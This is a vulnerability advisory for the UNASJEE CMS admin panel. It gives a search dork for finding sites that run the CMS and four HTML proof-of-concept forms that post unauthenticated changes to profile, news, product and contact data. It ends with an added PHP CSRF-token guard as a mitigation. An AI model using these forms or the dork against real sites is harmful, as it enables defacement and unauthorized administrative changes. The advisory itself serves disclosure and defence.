Unasjee CMS Cross Site Request Forgery

2015.03.25
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
############################################################
Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu
http://milw00rm.com / http://fiXen.org
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : UNASJEE CMS
|~Affected Version : All Version
|~Vendor : http://www.unasjee.net/
|~DORK : intext:Designed & Developed by: UNASJEE
|~RISK : High
|~Date: 22.03.2015
|~Tested On : [L] Kali Linux
####################INFO################################
The admin panel works without login: it is possible to POST data that the server will accept unconditionally.
########################################################
Demo and tested on:

----------------------------------------------------------
Change Profile Detail PoC
----------------------------------------------------------

<!-- Change Profile Detail -->
<html>
<body>
  <form action="http://[TARGET]/admincp/updprofile.php" method="POST">
    <input type="hidden" name="pfid" value="1" />
    <input type="hidden" name="sFullDescription" value="HACKERRRRRRR" />
    <input type="hidden" name="p1" value="HACKERRRRRRR" />
    <input type="hidden" name="Submit" value="Submit" />
    <input type="submit" value="Submit request" />
  </form>
</body>
</html>

----------------------------------------------------------
Add News PoC
----------------------------------------------------------

<form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();">
<table>
  <tr>
    <td valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;Title: </strong><span class="error">*</span></td>
    <td valign="top" bgcolor="E8EEF3"><input name="ntitle" type="text" class="txtdefault" id="ntitle"></td>
  </tr>
  <tr>
    <td valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;Date:&nbsp;</strong><span class="error">*</span></td>
    <td valign="top" bgcolor="E8EEF3"><input name="nDate" type="text" class="txtdefault" id="nDate"> &nbsp;(YYYY-MM-DD)</td>
  </tr>
  <tr>
    <td width="25%" valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;News:<span class="error">&nbsp;</span></strong><span class="error">*</span></td>
    <td width="75%" valign="top" bgcolor="E8EEF3"><textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td>
  </tr>
  <tr>
    <td bgcolor="E8EEF3">&nbsp;</td>
    <td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td>
  </tr>
</table>
</form>

----------------------------------------------------------
Add Products PoC
----------------------------------------------------------

<form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();">
<table width="450" border="0" cellpadding="1" cellspacing="2">
  <tr>
    <td width="29%" valign="top" bgcolor="E8EEF3">&nbsp;&nbsp;<strong>Name:</strong></td>
    <td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName"> &nbsp;<font color="#FF0000">*</font></td>
  </tr>
  <tr>
    <td bgcolor="E8EEF3">&nbsp;&nbsp;<strong>Show:</strong></td>
    <td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="6%"><input name="show" type="radio" value="y" checked></td>
        <td width="13%">Yes</td>
        <td width="5%"><input type="radio" name="show" value="n"></td>
        <td width="76%">No</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td bgcolor="E8EEF3">&nbsp;<strong>&nbsp;Category Image:</strong></td>
    <td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile"> &nbsp;70 x 62 px</td>
  </tr>
  <tr>
    <td bgcolor="E8EEF3">&nbsp;</td>
    <td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td>
  </tr>
</table>
</form>

----------------------------------------------------------
Change Contact Details PoC
----------------------------------------------------------

<form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php">
<input type="hidden" name="cid" value="1">
<table align=center width=525>
  <tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white">
    <td height="25" colspan=3><div align="center">Change your Contact Detail:</div></td>
  </tr>
  <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> &nbsp;First Contact Person:</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp1 type=text id="cp1" value="HACKER"></td> <td width="16">&nbsp;</td> </tr>
  <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd1 type=text id="cpd1" value="HACKER"></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm1 type=text id="cpm1" value="HACKER"></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> &nbsp;Second Contact Person:</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp2 type=text id="cp2" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd2 type=text id="cpd2" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm2 type=text id="cpm2" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%" height="25" bgcolor="#CCCCCC">&nbsp;Third Contact Person:</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp3 type=text id="cp3" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd3 type=text id="cpd3" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm3 type=text id="cpm3" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Phone I:</td> <td width="75%"> <input name=ph1 type=text id="ph1" value="HACKER"></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Phone II:</td> <td width="75%"> <input name=ph2 type=text id="ph2" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Phone III:</td> <td width="75%"> <input name=ph3 type=text id="ph3" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Fax I:</td> <td width="75%"> <input name=fax1 type=text id="fax1" value="HACKER"></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">E - Mail I:</td> <td width="75%"> <input name=email1 type=text id="email1" value="HACKER"></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">E - Mail II:</td> <td width="75%"> <input name=email2 type=text id="email2" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">E - Mail II:</td> <td width="75%"> <input name=email3 type=text id="email3" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">Web Site:</td> <td width="75%"> <input name=web type=text id="web" value="HACKER"></td> <td>&nbsp;</td> </tr>
  <tr> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td>Skype:</td> <td><input name=skype type=text id="skype" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td>Yahoo:</td> <td><input name=yahoo type=text id="yahoo" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td>gTalk:</td> <td><input name=gtalk type=text id="gtalk" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td>MSN:</td> <td><input name=msn type=text id="msn" value=""></td> <td>&nbsp;</td> </tr>
  <tr> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%"><div><strong>Asia Head Office&nbsp;Address:</strong></div> <br></td> <td width="75%"> <textarea name=haddress cols=38 rows=4 id="haddress">HACKER</textarea></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%"><strong>Hong Kong Office&nbsp;Address:</strong> </td> <td width="75%"> <textarea name=faddress cols=38 rows=4 id="faddress"></textarea></td> <td>&nbsp;</td> </tr>
  <tr> <td><strong>Australian&nbsp;Office&nbsp;Address:</strong></td> <td><textarea name=fax2 cols=38 rows=4 id="fax2"></textarea></td> <td>&nbsp;</td> </tr>
  <tr> <td width="35%">&nbsp;</td> <td width="75%"> <input type="submit" name="Submit" value="Submit"> <input name="reset" type="reset" id="reset" value="Reset"></td> <td>&nbsp;</td> </tr>
</table>
</form>
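
A server-side guard for the admincp handlers that the PoCs above post to, as an added example (not code from the advisory or from the vendor). It rejects any request that lacks an authenticated admin session or a per-session anti-CSRF token; the session keys `admin_id` and `csrf_token` and both function names are assumptions, while `pfid` is the field name from the first PoC.

```php
<?php
// Added example: hypothetical guard for the admincp/*.php handlers named in
// the PoCs. Session keys and function names are assumptions, not vendor code.
declare(strict_types=1);

// SameSite=Strict keeps the session cookie off cross-site form posts.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);
session_start();

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Reject the request unless it is an authenticated, token-bearing POST. */
function require_admin_post(): void
{
    if (empty($_SESSION['admin_id'])) {          // set by the login page (assumed)
        http_response_code(401);
        exit('Login required');
    }
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        exit('POST only');
    }
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// updprofile.php would start with the guard, then validate its own fields.
require_admin_post();
$pfid = filter_input(INPUT_POST, 'pfid', FILTER_VALIDATE_INT);
if ($pfid === false || $pfid === null) {
    http_response_code(400);
    exit('Bad pfid');
}
// ... update the profile with a parameterised query ...
```

Each admin form then has to carry the token in a hidden `csrf_token` field whose value is `htmlspecialchars(csrf_token())`, so a form hosted on another origin, like the PoCs above, has no valid value to submit.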



Copyright 2024, cxsecurity.com

 
